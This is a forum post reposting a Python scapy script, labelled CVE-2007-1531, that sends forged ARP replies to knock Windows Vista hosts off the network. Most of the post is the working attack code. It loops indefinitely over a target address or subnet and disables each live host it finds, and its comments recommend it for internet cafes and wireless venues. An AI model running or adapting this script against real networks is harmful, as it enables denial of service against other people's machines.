‹‹ 上一主题 | 下一主题 ››
发新话题
打印

MS Windows Vista forged ARP packet Network Stack DoS Exploit

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3917 
精华
128 
积分
209624 
阅读权限
200 
性别
男 
在线时间
1092 小时 
注册时间
2007-10-23 
最后登录
2008-7-6 

资料收集奖 运营支持奖

楼主 发表于 2007-5-23 12:06  只看该作者

MS Windows Vista forged ARP packet Network Stack DoS Exploit

Code Language : Python
  1. #!/usr/bin/env python
  2. #
  3. # :: Kristian Hermansen ::
  4. # Date: 20070514
  5. # Reference: CVE-2007-1531
  6. # Description: Microsoft Windows Vista (SP0) dumps interfaces when
  7. # it receives this ARP packet. This DoS is useful for an internet
  8. # cafe, wireless venue, or legitimate local attack. The victim will
  9. # need to manually refresh their network interface. OK, sure
  10. # it's a dumb local attack, but why does Vista disable iface!?!??
  11. # -> Thanks to Newsham / Hoagland
  12. # Vulnerable: Microsoft Windows Vista (SP0) [All Versions]
  13. # Tested:
  14. # * victim == Windows Vista Enterprise (SP0) [English]
  15. # * attacker == Ubuntu Feisty (7.04)
  16. # Usage: python fISTArp.py <victim>
  17. # Depends: scapy.py
  18. # [?] If you don't have scapy
  19. # [+] wget [url]http://hg.secdev.org/scapy/raw-file/tip/scapy.py[/url]
  20.  
  21. from sys import argv
  22. from os import geteuid
  23. from scapy import Ether,ARP,send,srp,conf
  24. from time import sleep
  25.  
  26. conf.verb = 0
  27.  
  28. def head():
  29.   print \"\"\"
  30.            __ ___ ____ _____ _        
  31.           / _|_ _/ ___|_  _|/ \ _ __ _ __
  32.           | |_ | |\___ \ | | / _ \ | '__| '_ \
  33.           | _|| | ___) || |/ ___ \| | | |_) |
  34.           |_| |___|____/ |_/_/  \_\_| | .__/
  35.                          |_|  
  36.  
  37.  \"\"\"
  38.  
  39. def isroot():
  40.  if geteuid() != 0:
  41.    print \"TRY AGAIN AS ROOT SILLY...\"
  42.    return False
  43.  else:
  44.    return True
  45.  
  46. def usage():
  47.  print \"usage:\", argv[0], \"<victim(s)>\"
  48.  print \"examples:\", argv[0], \"192.168.1.100\"
  49.  print \"examples:\", argv[0], \"192.168.1.0/24\n\"
  50.  
  51. def fisting():
  52.  arp_fist = ARP(pdst=argv[1],op=2)
  53.  print \"We are going to loop forever, CTRL-C to stop...\n\"
  54.  while True:
  55.    sleep(3)
  56.    for a in arp_fist:
  57.      arping = Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=a.pdst)
  58.      ans,unans = srp(arping,timeout=0.1)
  59.      if len(ans) == 1:
  60.        a.psrc=a.pdst
  61.        print a.pdst, \"is ALIVE!\"
  62.        print \"* Time to shut it down!\"
  63.        send(a)
  64.        ans2,unans2 = srp(arping,timeout=0.1)
  65.        if len(unans2) == 1:
  66.          print \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"
  67.          print \"@@@\", a.psrc, \"was rubber fisted!\"
  68.          print \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"
  69.          sleep(3)
  70.        else:
  71.          print \"FAILED:\", a.pdst, \"is still alive :-(\"
  72.      else:
  73.        print a.pdst, \"is already DEAD!\"
  74.      print
  75.  
  76. head()
  77. if isroot() != True:
  78.  exit(1)
  79. if len(argv) != 2:
  80.  usage()
  81.  exit(1)
  82. else:
  83.  fisting()
  84.  
  85. # u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.
Parsed in 0.016 seconds

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题